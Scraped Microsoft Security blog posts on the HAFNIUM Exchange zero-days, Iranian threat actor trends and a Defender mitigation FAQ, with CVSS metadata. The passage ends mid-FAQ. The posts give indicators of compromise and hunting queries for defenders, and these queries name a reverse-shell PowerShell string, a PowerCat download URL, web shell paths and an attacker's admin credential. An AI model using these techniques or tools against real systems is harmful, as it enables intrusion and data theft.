sees increased use of these vulnerabilities in attacks targeting unpatched systems by multiple malicious actors beyond HAFNIUM. To aid customers in investigating these attacks, __Microsoft Security Response Center (MSRC) has provided additional resources, including new mitigation guidance: [Microsoft Exchange Server Vulnerabilities Mitigations \u2013 March 2021](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>)_\n\n_**Update [03/04/2021]**: The Exchange Server team released a script for checking HAFNIUM indicators of compromise (IOCs). See Scan Exchange log files for indicators of compromise._\n\n \n\nMicrosoft has detected multiple 0-day exploits being used to attack on-premises versions of Microsoft Exchange Server in limited and targeted attacks. In the attacks observed, the threat actor used these vulnerabilities to access on-premises Exchange servers which enabled access to email accounts, and allowed installation of additional malware to facilitate long-term access to victim environments. Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to [HAFNIUM](<https://blogs.microsoft.com/on-the-issues/?p=64505>), a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures.\n\nThe vulnerabilities recently being exploited were CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065, all of which were addressed in today\u2019s [Microsoft Security Response Center (MSRC) release - Multiple Security Updates Released for Exchange Server](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server>). We strongly urge customers to update on-premises systems immediately. Exchange Online is not affected.\n\nWe are sharing this information with our customers and the security community to emphasize the critical nature of these vulnerabilities and the importance of patching all affected systems immediately to protect against these exploits and prevent future abuse across the ecosystem. This blog also continues our mission to shine a light on malicious actors and elevate awareness of the sophisticated tactics and techniques used to target our customers. The related IOCs, [Azure Sentinel](<https://azure.microsoft.com/en-us/services/azure-sentinel/>) advanced hunting queries, and [Microsoft Defender for Endpoint](<https://www.microsoft.com/en-us/microsoft-365/security/endpoint-defender>) product detections and queries shared in this blog will help SOCs proactively hunt for related activity in their environments and elevate any alerts for remediation.\n\nMicrosoft would like to thank our industry colleagues at Volexity and Dubex for reporting different parts of the attack chain and their collaboration in the investigation. Volexity has also [published a blog post](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities>) with their analysis. It is this level of proactive communication and intelligence sharing that allows the community to come together to get ahead of attacks before they spread and improve security for all.\n\n## Who is HAFNIUM?\n\nHAFNIUM primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.\n\nHAFNIUM has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like [Covenant](<https://github.com/cobbr/Covenant>), for command and control. Once they\u2019ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like [MEGA](<https://mega.nz/>).\n\nIn campaigns unrelated to these vulnerabilities, Microsoft has observed HAFNIUM interacting with victim Office 365 tenants. While they are often unsuccessful in compromising customer accounts, this reconnaissance activity helps the adversary identify more details about their targets\u2019 environments.\n\nHAFNIUM operates primarily from leased virtual private servers (VPS) in the United States.\n\n## Technical details\n\nMicrosoft is providing the following details to help our customers understand the techniques used by HAFNIUM to exploit these vulnerabilities and enable more effective defense against any future attacks against unpatched systems.\n\n[CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>) is a server-side request forgery (SSRF) vulnerability in Exchange which allowed the attacker to send arbitrary HTTP requests and authenticate as the Exchange server.\n\n[CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>) is an insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization is where untrusted user-controllable data is deserialized by a program. Exploiting this vulnerability gave HAFNIUM the ability to run code as SYSTEM on the Exchange server. This requires administrator permission or another vulnerability to exploit.\n\n[CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>) is a post-authentication arbitrary file write vulnerability in Exchange. If HAFNIUM could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin\u2019s credentials.\n\n[CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) is a post-authentication arbitrary file write vulnerability in Exchange. If HAFNIUM could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin\u2019s credentials.\n\n## Attack details\n\nAfter exploiting these vulnerabilities to gain initial access, HAFNIUM operators deployed web shells on the compromised server. Web shells potentially allow attackers to steal data and perform additional malicious actions that lead to further compromise. One example of a web shell deployed by HAFNIUM, written in ASP, is below:\n\n\n\nFollowing web shell deployment, HAFNIUM operators performed the following post-exploitation activity:\n\n * Using Procdump to dump the LSASS process memory:\n\n\n\n * Using 7-Zip to compress stolen data into ZIP files for exfiltration:\n\n\n\n * Adding and using Exchange PowerShell snap-ins to export mailbox data:\n\n\n\n * Using the [Nishang](<https://github.com/samratashok/nishang>) Invoke-PowerShellTcpOneLine reverse shell:\n\n\n\n * Downloading PowerCat from GitHub, then using it to open a connection to a remote server:\n\n\n\nHAFNIUM operators were also able to download the Exchange offline address book from compromised systems, which contains information about an organization and its users.\n\nOur blog, [Defending Exchange servers under attack](<https://www.microsoft.com/security/blog/2020/06/24/defending-exchange-servers-under-attack/>), offers advice for improving defenses against Exchange server compromise. Customers can also find additional guidance about web shell attacks in our blog [Web shell attacks continue to rise.](<https://www.microsoft.com/security/blog/2021/02/11/web-shell-attacks-continue-to-rise/>)\n\n## Can I determine if I have been compromised by this activity?\n\nThe below sections provide indicators of compromise (IOCs), detection guidance, and advanced hunting queries to help customers investigate this activity using Exchange server logs, Azure Sentinel, Microsoft Defender for Endpoint, and Microsoft 365 Defender. We encourage our customers to conduct investigations and implement proactive detections to identify possible prior campaigns and prevent future campaigns that may target their systems.\n\n### Check patch levels of Exchange Server\n\nThe Microsoft Exchange Server team has published a [blog post on these new Security Updates](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901>) providing a script to get a quick inventory of the patch-level status of on-premises Exchange servers and answer some basic questions around installation of these patches.\n\n### Scan Exchange log files for indicators of compromise\n\nThe Exchange Server team has created a script to run a check for HAFNIUM IOCs to address performance and memory concerns. That script is available here: <https://github.com/microsoft/CSS-Exchange/tree/main/Security>.\n\n * CVE-2021-26855 exploitation can be detected via the following Exchange HttpProxy logs: \n * These logs are located in the following directory: %PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\Logging\\HttpProxy\n * Exploitation can be identified by searching for log entries where the AuthenticatedUser is empty and the AnchorMailbox contains the pattern of ServerInfo~*/* \n * Here is an example PowerShell command to find these log entries:\n\n`Import-Csv -Path (Get-ChildItem -Recurse -Path \"$env:PROGRAMFILES\\Microsoft\\Exchange Server\\V15\\Logging\\HttpProxy\" -Filter '*.log').FullName | Where-Object { $_.AnchorMailbox -like 'ServerInfo~*/*' -or $_.BackEndCookie -like 'Server~*/*~*'} | select DateTime, AnchorMailbox, UrlStem, RoutingHint, ErrorCode, TargetServerVersion, BackEndCookie, GenericInfo, GenericErrors, UrlHost, Protocol, Method, RoutingType, AuthenticationType, ServerHostName, HttpStatus, BackEndStatus, UserAgent`\n\n * * If activity is detected, the logs specific to the application specified in the AnchorMailbox path can be used to help determine what actions were taken. \n * These logs are located in the %PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\Logging directory.\n * CVE-2021-26858 exploitation can be detected via the Exchange log files: \n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Logging\\OABGeneratorLog\n * Files should only be downloaded to the %PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\ClientAccess\\OAB\\Temp directory \n * In case of exploitation, files are downloaded to other directories (UNC or local paths)\n * Windows command to search for potential exploitation:\n\n`findstr /snip /c:\"Download failed and temporary file\" \"%PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\Logging\\OABGeneratorLog\\*.log\"`\n\n * CVE-2021-26857 exploitation can be detected via the Windows Application event logs \n * Exploitation of this deserialization bug will create Application events with the following properties: \n * Source: MSExchange Unified Messaging\n * EntryType: Error\n * Event Message Contains: System.InvalidCastException\n * Following is PowerShell command to query the Application Event Log for these log entries:\n\n`Get-EventLog -LogName Application -Source \"MSExchange Unified Messaging\" -EntryType Error | Where-Object { $_.Message -like \"*System.InvalidCastException*\" }`\n\n * CVE-2021-27065 exploitation can be detected via the following Exchange log files: \n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Logging\\ECP\\Server\n\nAll Set-<AppName>VirtualDirectory properties should never contain script. InternalUrl and ExternalUrl should only be valid Uris.\n\n * * Following is a PowerShell command to search for _potential_ exploitation:\n\n`Select-String -Path \"$env:PROGRAMFILES\\Microsoft\\Exchange Server\\V15\\Logging\\ECP\\Server\\*.log\" -Pattern 'Set-.+VirtualDirectory'`\n\n## Host IOCs\n\nMicrosoft is releasing a feed of observed indicators of compromise (IOCs) in related attacks. This feed is available in both [CSV](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.csv>) and [JSON](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.json>) formats. This information is being shared as TLP:WHITE.\n\n### Hashes\n\nWeb shell hashes\n\n * b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0\n * 097549cf7d0f76f0d99edf8b2d91c60977fd6a96e4b8c3c94b0b1733dc026d3e\n * 2b6f1ebb2208e93ade4a6424555d6a8341fd6d9f60c25e44afe11008f5c1aad1\n * 65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5\n * 511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1\n * 4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea\n * 811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d\n * 1631a90eb5395c4e19c7dbcbf611bbe6444ff312eb7937e286e4637cb9e72944\n\n### Paths\n\nWe observed web shells in the following paths:\n\n * _C:\\inetpub\\wwwroot\\aspnet_client\\_\n * _C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\_\n * _In Microsoft Exchange Server installation paths such as:_\n * _%PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\_\n * _C:\\Exchange\\FrontEnd\\HttpProxy\\owa\\auth\\_\n\nThe web shells we detected had the following file names:\n\n * _web.aspx_\n * _help.aspx_\n * _document.aspx_\n * _errorEE.aspx_\n * _errorEEE.aspx_\n * _errorEW.aspx_\n * _errorFF.aspx_\n * _healthcheck.aspx_\n * _aspnet_www.aspx_\n * _aspnet_client.aspx_\n * _xx.aspx_\n * _shell.aspx_\n * _aspnet_iisstart.aspx_\n * _one.aspx_\n\n_ _Check for suspicious .zip, .rar, and .7z files in _C:\\ProgramData\\_, which may indicate possible data exfiltration.\n\nCustomers should monitor these paths for LSASS dumps:\n\n * _C:\\windows\\temp\\_\n * _C:\\root\\_\n\n### Tools\n\n * [Procdump](<https://docs.microsoft.com/en-us/sysinternals/downloads/procdump>)\n * [Nishang](<https://github.com/samratashok/nishang>)\n * [PowerCat](<https://github.com/besimorhino/powercat>)\n\nMany of the following detections are for post-breach techniques used by HAFNIUM. So while these help detect some of the specific current attacks that Microsoft has observed it remains very important to apply the recently released updates for CVE-2021-26855, CVE-2021-26857, CVE-2021-27065 and CVE-2021-26858.\n\n## Microsoft Defender Antivirus detections\n\nPlease note that some of these detections are generic detections and not unique to this campaign or these exploits.\n\n * Exploit:Script/Exmann.A!dha\n * Behavior:Win32/Exmann.A\n * Backdoor:ASP/SecChecker.A\n * Backdoor:JS/Webshell _(not unique)_\n * Trojan:JS/Chopper!dha _(not unique)_\n * Behavior:Win32/DumpLsass.A!attk _(not unique)_\n * Backdoor:HTML/TwoFaceVar.B _(not unique)_\n\n## Microsoft Defender for Endpoint detections\n\n * Suspicious Exchange UM process creation\n * Suspicious Exchange UM file creation\n * Possible web shell installation _(not unique)_\n * Process memory dump _(not unique)_\n\n## Azure Sentinel detections\n\n * [HAFNIUM Suspicious Exchange Request](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/W3CIISLog/HAFNIUMSuspiciousExchangeRequestPattern.yaml>)\n * [HAFNIUM UM Service writing suspicious file](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/HAFNIUMUmServiceSuspiciousFile.yaml>)\n * [HAFNIUM New UM Service Child Process](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/HAFNIUMNewUMServiceChildProcess.yaml>)\n * [HAFNIUM Suspicious UM Service Errors](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/HAFNIUMSuspiciousIMServiceError.yaml>)\n * [HAFNIUM Suspicious File Downloads](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/htttp_proxy_oab_CL/HAFNIUMSuspiciousFileDownloads.yaml>)\n\n## Advanced hunting queries\n\nTo locate possible exploitation activity related to the contents of this blog, you can run the following [advanced hunting](<https://securitycenter.windows.com/hunting>) queries via Microsoft Defender for Endpoint and Azure Sentinel:\n\n### Microsoft Defender for Endpoint advanced hunting queries\n\nMicrosoft 365 Defender customers can find related hunting queries below or at this GitHub location: [https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/ ](<https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/>)\n\nAdditional queries and information are available via [_Threat Analytics portal_](<https://securitycenter.windows.com/threatanalytics3/>) for Microsoft Defender customers.\n\n**UMWorkerProcess.exe in Exchange creating abnormal content**\n\nLook for Microsoft Exchange Server\u2019s Unified Messaging service creating non-standard content on disk, which could indicate web shells or other malicious content, suggesting exploitation of CVE-2021-26858 vulnerability:\n\n`DeviceFileEvents | where InitiatingProcessFileName == \"UMWorkerProcess.exe\" | where FileName != \"CacheCleanup.bin\" | where FileName !endswith \".txt\" | where FileName !endswith \".LOG\" | where FileName !endswith \".cfg\" | where FileName != \"cleanup.bin\"`\n\n**UMWorkerProcess.exe spawning**\n\nLook for Microsoft Exchange Server\u2019s Unified Messaging service spawning abnormal subprocesses, suggesting exploitation of CVE-2021-26857 vulnerability:\n\n`DeviceProcessEvents | where InitiatingProcessFileName == \"UMWorkerProcess.exe\" | where FileName != \"wermgr.exe\" | where FileName != \"WerFault.exe\"`\n\nPlease note excessive spawning of wermgr.exe and WerFault.exe could be an indicator of compromise due to the service crashing during deserialization.\n\n### Azure Sentinel advanced hunting queries\n\nAzure Sentinel customers can find a Sentinel query containing these indicators in the Azure Sentinel Portal or at this GitHub location: <https://github.com/Azure/Azure-Sentinel/tree/master/Detections/MultipleDataSources/>.\n\nLook for Nishang Invoke-PowerShellTcpOneLine in Windows Event Logging:\n\n`SecurityEvent | where EventID == 4688 | where Process has_any (\"powershell.exe\", \"PowerShell_ISE.exe\") | where CommandLine has \"$client = New-Object System.Net.Sockets.TCPClient\"`\n\nLook for downloads of PowerCat in cmd and Powershell command line logging in Windows Event Logs:\n\n`SecurityEvent | where EventID == 4688 | where Process has_any (\"cmd.exe\", \"powershell.exe\", \"PowerShell_ISE.exe\") | where CommandLine has \"https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1\"`\n\nLook for Exchange PowerShell Snapin being loaded. This can be used to export mailbox data, subsequent command lines should be inspected to verify usage:\n\n`SecurityEvent | where EventID == 4688 | where Process has_any (\"cmd.exe\", \"powershell.exe\", \"PowerShell_ISE.exe\") | where isnotempty(CommandLine) | where CommandLine contains \"Add-PSSnapin Microsoft.Exchange.Powershell.Snapin\" | summarize FirstSeen = min(TimeGenerated), LastSeen = max(TimeGenerated) by Computer, Account, CommandLine`\n\n \n\nThe post [HAFNIUM targeting Exchange Servers with 0-day exploits](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-02T21:07:53", "type": "mmpc", "title": "HAFNIUM targeting Exchange Servers with 0-day exploits", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-02T21:07:53", "id": "MMPC:28641FE2F73292EB4B26994613CC882B", "href": "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-19T19:23:28", "description": "Over the past year, the Microsoft Threat Intelligence Center (MSTIC) has observed a gradual evolution of the tools, techniques, and procedures employed by malicious network operators based in Iran. At [CyberWarCon 2021](<https://www.cyberwarcon.com/>), MSTIC analysts presented their analysis of these trends in Iranian nation state actor activity during a session titled \u201c_The Iranian evolution: Observed changes in Iranian malicious network operations_\u201d. This blog is intended to summarize the content of that research and the topics covered in their presentation and demonstrate MSTIC\u2019s ongoing efforts to track these actors and protect customers from the related threats.\n\nMSTIC consistently tracks threat actor activity, including the groups discussed in this blog, and works across Microsoft Security products and services to build detections into our products that improve customer protections. We are sharing this blog today so that others in the community can also be aware of the latest techniques we have observed being used by Iranian actors.\n\nAs with any observed nation-state actor activity, Microsoft has directly notified customers that have been targeted or compromised, providing them with the information they need to help secure their accounts. Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or a developing cluster of threat activity, allowing MSTIC to track it as a unique set of information until we reach a high confidence about the origin or identity of the actor behind the activity. Once it meets the criteria, a DEV is converted to a named actor.\n\nThree notable trends in Iranian nation-state operators have emerged:\n\n * They are increasingly utilizing ransomware to either collect funds or disrupt their targets.\n * They are more patient and persistent while engaging with their targets.\n * While Iranian operators are more patient and persistent with their social engineering campaigns, they continue to employ aggressive brute force attacks on their targets.\n\n## Ransomware\n\nSince September 2020, MSTIC has observed six Iranian threat groups deploying ransomware to achieve their strategic objectives. These ransomware deployments were launched in waves every six to eight weeks on average.\n\n\n\n_Figure 1: Timeline of ransomware attacks by Iranian threat actors_\n\nIn one observed campaign, PHOSPHORUS targeted the Fortinet FortiOS SSL VPN and unpatched on-premises Exchange Servers globally with the intent of deploying ransomware on vulnerable networks. A recent blog post by the [DFIR Report](<https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/>) describes a similar intrusion in which actors leveraged vulnerabilities in on-premise Exchange Servers to compromise a victim environment and encrypt systems via BitLocker. MSTIC also attributes this activity to PHOSPHORUS. PHOSPHORUS operators conducted widespread scanning and ransomed targeted systems through a five-step process: Scan, Exploit, Review, Stage, Ransom.\n\n### Scan\n\nIn the early part of 2021, PHOSPHORUS actors scanned millions of IPs on the internet for Fortinet FortiOS SSL VPN that were vulnerable to [CVE-2018-13379](<https://www.fortiguard.com/psirt/FG-IR-18-384>). This vulnerability allowed the attackers to collect clear-text credentials from the sessions file on vulnerable Fortinet VPN appliances. The actors collected credentials from over 900 Fortinet VPN servers in the United States, Europe, and Israel so far this year. In the last half of 2021, PHOSPHORUS shifted to scanning for unpatched on-premises Exchange Servers vulnerable to ProxyShell ([CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>)).\n\n### Exploit\n\nWhen they identified vulnerable servers, PHOSPHORUS sought to gain persistence on the target systems. In some instances, the actors downloaded a Plink runner named _MicrosoftOutLookUpdater.exe_. This file would beacon periodically to their C2 servers via SSH, allowing the actors to issue further commands. Later, the actors would download a custom implant via a Base64-encoded PowerShell command. This implant established persistence on the victim system by modifying startup registry keys and ultimately functioned as a loader to download additional tools.\n\n### Review\n\nAfter gaining persistence, PHOSPHORUS actors triaged hundreds of victims to determine which of them were fitting for actions on objectives. On select victims, operators created local administrator accounts with a with a username of \u201chelp\u201d and password of \u201c_AS_@1394\u201d via the commands below. On occasion, actors dumped LSASS to acquire credentials to be used later for lateral movement.\n\n\n\n### Stage and Ransom\n\nFinally, MSTIC observed PHOSPHORUS employing BitLocker to encrypt data and ransom victims at several targeted organizations. BitLocker is a full volume encryption feature meant to be used for legitimate purposes. After compromising the initial server (through vulnerable VPN or Exchange Server), the actors moved laterally to a different system on the victim network to gain access to higher value resources. From there, they deployed a script to encrypt the drives on multiple systems. Victims were instructed to reach out to a specific Telegram page to pay for the decryption key.\n\n\n\n## Patience and persistence\n\nMSTIC has observed PHOSPHORUS threat actors employing social engineering to build rapport with their victims before targeting them. These operations likely required significant investment in the operator\u2019s time and resources to refine and execute. This trend indicates PHOSPHORUS is either moving away from or expanding on their past tactics of sending unsolicited links and attachments in spear-phishing email campaigns to attempt credential theft.\n\n### PHOSHORUS \u2013 Patient and persistent\n\nPHOSPHORUS sends \u201cinterview requests\u201d to target individuals through emails that contain tracking links to confirm whether the user has opened the file. Once a response is received from the target user, PHOSPHORUS attackers send a link to a benign list of interview questions hosted on a cloud service provider. The attackers continue with several back-and-forth conversations discussing the questions with the target user before finally sending a meeting invite with a link masquerading as a Google Meeting.\n\nOnce the meeting invite is sent, the attackers continuously reach out to the target user, asking them to test the Google Meeting link. The attackers contact the targeted user multiple times per day, continuously pestering them to click the link. The attackers even go so far as to offer to call the target user to walk them through clicking the link. The attackers are more than willing to troubleshoot any issues the user has signing into the fake Google Meeting link, which leads to a credential harvesting page.\n\nMSTIC has observed PHOSPHORUS operators become very aggressive in their emails after the initial lure is sent, to the point where they are almost demanding a response from the targeted user.\n\n### CURIUM \u2013 In it for the long run\n\nCURIUM is another Iranian threat actor group that has shown a great deal of patience when targeting users. Instead of phishing emails, CURIUM actors leverage a network of fictitious social media accounts to build trust with targets and deliver malware.\n\nThese attackers have followed the following playbook:\n\n * Masquerade as an attractive woman on social media\n * Establish a connection via social media with a target user via LinkedIn, Facebook, etc.\n * Chat with the target daily\n * Send benign videos of the woman to the target to prime them to lower their guard\n * Send malicious files to the target similar the benign files previously sent\n * Request that the target user open the malicious document\n * Exfiltrate data from the victim machine\n\nThe process above can take multiple months from the initial connection to the delivery of the malicious document. The attackers build a relationship with target users over time by having constant and continuous communications which allows them to build trust and confidence with the target. In many of the cases we have observed, the targets genuinely believed that they were making a human connection and not interacting with a threat actor operating from Iran.\n\nBy exercising patience, building relationships, and pestering targets continuously once a relationship has been formed, Iranian threat actors have had more success in compromising their targets.\n\n## Brute force\n\nIn 2021, MSTIC observed DEV-0343 aggressively targeting Office 365 tenants via an ongoing campaign of password spray attacks. DEV-0343 is a threat actor MSTIC assesses to be likely operating in support of Iranian interests. MSTIC has [blogged about DEV-0343 activity previously](<https://www.microsoft.com/security/blog/2021/10/11/iran-linked-dev-0343-targeting-defense-gis-and-maritime-sectors/>).\n\nAnalysis of Office 365 logs suggests that DEV-0343 is using a red team tool like [o365spray](<https://github.com/0xZDH/o365spray>) to conduct these attacks.\n\nTargeting in this DEV-0343 activity has been observed across defense companies that support United States, European Union, and Israeli government partners producing military-grade radars, drone technology, satellite systems, and emergency response communication systems. Further activity has targeted customers in geographic information systems (GIS), spatial analytics, regional ports of entry in the Persian Gulf, and several maritime and cargo transportation companies with a business focus in the Middle East.\n\nAs we discussed in our previous blog, DEV-0343 operators\u2019 \u2018pattern of life\u2019 is consistent with the working schedule of actors based in Iran. DEV-0343 operator activity peaked Sunday through Thursday between 04:00:00 and 16:00:00 UTC.\n\n\n\n_Figure 2: DEV-0343 observed operating hours in UTC_\n\n\n\n_Figure 3: DEV-0343 observed actor requests per day_\n\nKnown DEV-0343 operators have also been observed targeting the same account on the same tenant being targeted by other known Iranian operators. For example, EUROPIUM operators attempted to access a specific account on June 12, 2021 and ultimately gained access to this account on June 13, 2021. DEV-0343 was then observed targeting this same account within minutes of EUROPIUM operators gaining access to it the same day. MSTIC assesses that these observed overlapping activities suggest a coordination between different Iranian actors pursuing common objectives.\n\n## Closing thoughts: Increasingly capable threat actors\n\nAs Iranian operators have adapted both their strategic goals and tradecraft, over time they have evolved into more competent threat actors capable of conducting a full spectrum of operations including:\n\n * Information operations\n * Disruption and destruction\n * Support to physical operations\n\nSpecifically, Iranian operators have proven themselves to be both willing and able to:\n\n * Deploy ransomware\n * Deploy disk wipers\n * Deploy mobile malware\n * Conduct phishing attacks\n * Conduct password spray attacks\n * Conduct mass exploitation attacks\n * Conduct supply chain attacks\n * Cloak C2 communications behind legitimate cloud services\n\nMSTIC thanks CyberWarCon 2021 for the opportunity to present this research to the broader security community. Microsoft will continue to monitor all this activity by Iranian actors and implement protections for our customers.\n\n \n\nThe post [Evolving trends in Iranian threat actor activity \u2013 MSTIC presentation at CyberWarCon 2021](<https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-16T16:00:08", "type": "mmpc", "title": "Evolving trends in Iranian threat actor activity \u2013 MSTIC presentation at CyberWarCon 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-11-16T16:00:08", "id": "MMPC:C0F4687B18D53FB9596AD4FDF77092D8", "href": "https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-19T22:36:39", "description": "As cybercriminals continue to exploit unpatched on-premises versions of Exchange Server 2013, 2016, and 2019, we continue to actively work with customers and partners to help them secure their environments and respond to associated threats. To date, we have [released a comprehensive Security Update](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901>), a one-click interim [Exchange On-Premises Mitigation Tool](<https://aka.ms/eomtrelease>) for both current and out-of-support versions of on-premises Exchange Servers, and [step-by-step guidance](<https://aka.ms/exchange-customer-guidance>) to help address these attacks.\n\nToday, we have taken an additional step to further support our customers who are still vulnerable and have not yet implemented the complete security update. With the latest security intelligence update, Microsoft Defender Antivirus and System Center Endpoint Protection will **automatically mitigate** CVE-2021-26855 on any vulnerable Exchange Server on which it is deployed. Customers do not need to take action beyond ensuring they have installed the latest security intelligence update (build **1.333.747.0** or newer), if they do not already have automatic updates turned on.\n\n\n\nThe Exchange security update is still the most comprehensive way to protect your servers from these attacks and others fixed in earlier releases. This interim mitigation is designed to help protect customers while they take the time to implement the latest Exchange Cumulative Update for their version of Exchange.\n\nMicrosoft will provide guidance to our security partners so that they have the option to make available similar, simple mitigations in their products as well.\n\nWe are deeply committed to protecting our customers. To stay up to date please continue to review the content posted at <https://aka.ms/exchangevulns>.\n\n### Frequently Asked Questions\n\n**Q: If I have Microsoft Defender Antivirus installed on my Exchange Server do I need to take any further action to get this mitigation?**\n\nA: Customers that install Microsoft Defender Antivirus and have automatic definition updates enabled (default setting) do not have to take further action to receive the mitigation.\n\n**Q: My organization manages Microsoft Defender Antivirus definition updates. What do I need to do to ensure I have this mitigation?**\n\nA: Customers that manage Microsoft Defender Antivirus definition updates need to select the new detection build (**1.333.747.0 or newer**) and deploy that to the Exchange Server.\n\n**Q: After this mitigation, do I still need to install the security update?**\n\nA: Yes. This automatic mitigation breaks the attack chain by mitigating CVE-2021-26855. Customers should still prioritize getting current on security updates for Exchange Server to comprehensively address the vulnerabilities.\n\n**Q: When does Microsoft Defender Antivirus apply the mitigation?**\n\nA: Microsoft Defender Antivirus will automatically identify if a vulnerable version of Exchange Server is installed and apply the mitigations the first time the security intelligence update is deployed. The mitigation is deployed once per 